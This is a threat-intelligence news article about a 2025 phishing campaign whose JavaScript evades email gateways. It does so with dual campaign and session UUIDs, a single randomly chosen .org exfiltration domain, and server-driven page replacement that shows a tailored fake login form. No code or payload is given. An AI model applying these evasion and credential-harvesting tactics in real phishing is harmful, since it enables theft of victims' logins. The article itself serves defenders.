A sophisticated new phishing attack discovered in early February 2025 is successfully bypassing Secure Email Gateways (SEGs) and evading perimeter defenses through an ingenious combination of random domain selection, dynamic UUID generation, and browser session manipulation.
The attack leverages a highly specialized JavaScript embedded in malicious attachments and spoofed cloud collaboration platforms, making it exceptionally difficult for traditional security tools to detect and block.
Cofense Intelligence has identified this advanced threat as part of an ongoing campaign that represents a significant evolution in credential theft tactics, demanding immediate attention from security professionals and organizations worldwide.
Unlike conventional phishing scripts that rely on redundant domain retries and static redirects, this threat employs three standout tactics that fundamentally change how defenders must approach email security.
Understanding these mechanisms is essential for organizations seeking to bolster their defenses against an increasingly sophisticated threat landscape.
The Dual UUID Deception Strategy
At the heart of this attack lies an unusual dual UUID approach that demonstrates remarkable sophistication.
Analyzing the script, we can see that it starts by loading jQuery from a legitimate source for hosting popular web libraries (cdnjs[.]cloudflare[.]com), a common web tool to manipulate the page quietly in the background
The script generates two distinct identifiers: a hardcoded campaign UUID (6fafd0343-d771-4987-a760-25e5b31b44f) that tracks the overall campaign, and a dynamically generated session UUID that monitors individual victims.
This dual-tracking mechanism mimics legitimate application programming interfaces (APIs), enabling threat actors to correlate exfiltrated credentials with specific victims while maintaining campaign-level analytics.
This approach is unprecedented in its ability to provide granular victim tracking while maintaining operational security, suggesting a well-resourced threat actor with advanced technical capabilities.
The hardcoded UUID likely serves as a campaign or target group marker, indicating that this script may be part of a reusable package designed for deployment across multiple phishing campaigns with different spoofed brands.
This modular approach allows attackers to maximize the return on their development investment while adapting to different organizational targets with minimal code modifications.
Rather than employing the traditional multi-domain failover approach common in phishing attacks, this script selects a single random .org domain from a hardcoded list of nine seemingly random, wordless domains.
This unusual tactic significantly reduces network traffic and minimizes the telltale signs that intrusion detection systems typically flag—multiple failed requests to different domains.
By eliminating failover logic, the attacker relies on a single connection per execution, reducing detectability while making the attack appear more like legitimate API traffic.
The deliberate choice to use .org domains over more frequently abused TLDs like .com, .dev, or .xyz reflects a strategic understanding of email security perceptions. The .org domain suffix carries perceived legitimacy and trustworthiness, making it less likely to be blocked by security tools.
This aligns with recent threat intelligence showing that .org domains remain significantly less exploited than their .com counterparts, giving this attack an additional advantage in bypassing traditional reputation-based filtering systems.
Server-Driven Dynamic Deception
The most deceptive aspect of this attack involves dynamic page replacement—the script fundamentally rewrites the entire webpage with server-provided content without changing the URL in the browser’s address bar.
After successfully sending an HTTPS POST request containing the victim’s email address and session UUID, the attacker’s server responds with a specially crafted login form tailored to the victim’s organization.
This technique, which aligns with MITRE ATT&CK framework T1185 (Browser Session Hijacking), maintains victim confidence in the phishing page’s legitimacy while extending the attack’s effectiveness.
The attack’s delivery vectors include HTML-based email attachments and spoofed links impersonating trusted cloud collaboration platforms including Microsoft OneDrive, SharePoint Online, DocuSign, Google Docs, and Adobe Sign.
This multi-vector approach ensures broad campaign reach while leveraging brand recognition to maximize victim engagement and credential compromise rates.
Organizations must immediately review their email security controls and implement additional verification mechanisms beyond traditional gateway filtering to defend against this evolving threat.
Follow us on Google News, LinkedIn, and X to Get Instant Updates and Set GBH as a Preferred Source in Google.
